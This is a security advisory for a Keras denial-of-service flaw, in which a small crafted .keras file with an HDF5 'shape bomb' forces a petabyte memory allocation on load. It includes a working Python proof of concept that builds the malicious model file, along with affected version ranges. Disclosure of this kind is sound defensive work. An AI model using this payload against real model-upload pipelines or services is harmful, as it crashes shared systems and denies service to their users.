GHSA-mgx6-5cf9-rr43

Suggest an improvement
Source
https://github.com/advisories/GHSA-mgx6-5cf9-rr43
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-mgx6-5cf9-rr43/GHSA-mgx6-5cf9-rr43.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-mgx6-5cf9-rr43
Aliases
Published
2026-05-06T23:09:37Z
Modified
2026-05-06T23:19:48.057022Z
Severity
  • 7.1 (High) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N CVSS Calculator
Summary
Keras vulnerable to DoS via Malicious .keras Model (HDF5 Shape Bomb Causes Petabyte Allocation in KerasFileEditor)
Details

Summary

Keras’s model loader (KerasFileEditor) unsafely loads user-supplied .keras model files containing HDF5-based weight files without performing any validation on HDF5 dataset metadata. An attacker can craft a .keras archive containing a valid model.weights.h5 file whose dataset declares an extremely large shape (e.g. (50000000, 50000000)), but stores only a few bytes. The .keras file remains small (100–400 KB) because HDF5 with gzip compression stores minimal data. During model loading, Keras executes: python result[key] = value[()] # loads entire dataset into memory value[()] instructs h5py to allocate RAM proportional to the dataset’s declared shape – in this case 8.88 PiB of memory. This results in: Immediate memory exhaustion Python / TensorFlow crashes Jupyter kernel kill System instability Full Denial of Service on any workload that processes untrusted .keras models This allows an attacker to crash any environment or pipeline that loads .keras models, including MLOps backends, training services, model upload endpoints, or automated pipelines.

Proof of Concept

// PoC.py
import zipfile
import io
import h5py
import numpy as np
from keras.saving import KerasFileEditor

# Create a malicious .keras model containing a massive HDF5 shape bomb
def create_malicious_keras(path="bomb.keras"):
    hdf5_bytes = io.BytesIO()

    # Create an HDF5 file with a huge declared dataset shape
    with h5py.File(hdf5_bytes, "w") as f:
        d = f.create_dataset(
            "payload",
            shape=(50_000_000, 50_000_000),    # Extremely large shape → petabytes on load
            dtype="float32",
            compression="gzip",
            compression_opts=9
        )
        # Write minimal data so the file stays very small
        d[0:1, 0:1] = np.zeros((1, 1), dtype=np.float32)

    hdf5_bytes.seek(0)

    # Build a valid .keras archive structure
    with zipfile.ZipFile(path, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("config.json", "{}")
        z.writestr("metadata.json", "{}")
        z.writestr("model.weights.h5", hdf5_bytes.getvalue())

# Generate the malicious model file
create_malicious_keras()

# Trigger the DoS vulnerability when Keras loads the malicious file
KerasFileEditor("bomb.keras")

Expected Result

numpy._core._exceptions._ArrayMemoryError:
Unable to allocate 8.88 PiB for an array with shape (50000000, 50000000)

This crash occurs before any actual model processing, confirming the Denial-of-Service impact.

Impact

This vulnerability allows an attacker to crash any system that loads a malicious .keras model file.

The attacker can:

  • Cause immediate memory exhaustion (8+ PiB allocation attempts)
  • Crash TensorFlow / Python interpreter
  • Kill Jupyter kernels
  • Break automated model-upload pipelines
  • Crash MLOps servers that process user models
  • Deny service to shared GPU/CPU environments

If a platform allows user-uploaded Keras models (training services, inference endpoints, AutoML tools, Kaggle-style platforms), this becomes a Remote Denial of Service vector. Additional PoC Evidence (Video Demonstration) Attached is a real-world proof-of-concept video demonstrating the crash and memory exhaustion when loading the malicious .keras model.

PoC Video (Google Drive): PoC Video

Finding: Critical memory-exhaustion flaw triggered by crafted .keras model files Vector: Malicious metadata causing extreme tensor shape inflation Impact: A 31 KB model forces an 8.88 PiB allocation attempt, immediately killing the process Attack Scenario: Remote DoS on ML model processing pipelines and cloud inference services

Demonstration: The PoC video shows the crash occurring on Google Colab. Loading the malicious model consumed all system RAM and repeatedly terminated the runtime. Severity is high enough that the compute quota dropped from 83 hours → 4 hours after only a few tests. With larger payloads, this would instantly exhaust resources in real production pipelines.

Database specific
{
    "severity": "HIGH",
    "cwe_ids": [
        "CWE-770"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-06T23:09:37Z",
    "nvd_published_at": null
}
References

Affected packages

PyPI / keras

Package

Affected ranges

Type
ECOSYSTEM
Events
Introduced
3.0.0
Fixed
3.12.1

Affected versions

3.*
3.0.0
3.0.1
3.0.2
3.0.3
3.0.4
3.0.5
3.1.0
3.1.1
3.2.0
3.2.1
3.3.0
3.3.1
3.3.2
3.3.3
3.4.0
3.4.1
3.5.0
3.6.0
3.7.0
3.8.0
3.9.0
3.9.1
3.9.2
3.10.0
3.11.0
3.11.1
3.11.2
3.11.3
3.12.0

Database specific

source
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-mgx6-5cf9-rr43/GHSA-mgx6-5cf9-rr43.json"
last_known_affected_version_range
"<= 3.12.0"

PyPI / keras

Package

Affected ranges

Type
ECOSYSTEM
Events
Introduced
3.13.0
Fixed
3.13.2

Affected versions

3.*
3.13.0
3.13.1

Database specific

source
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-mgx6-5cf9-rr43/GHSA-mgx6-5cf9-rr43.json"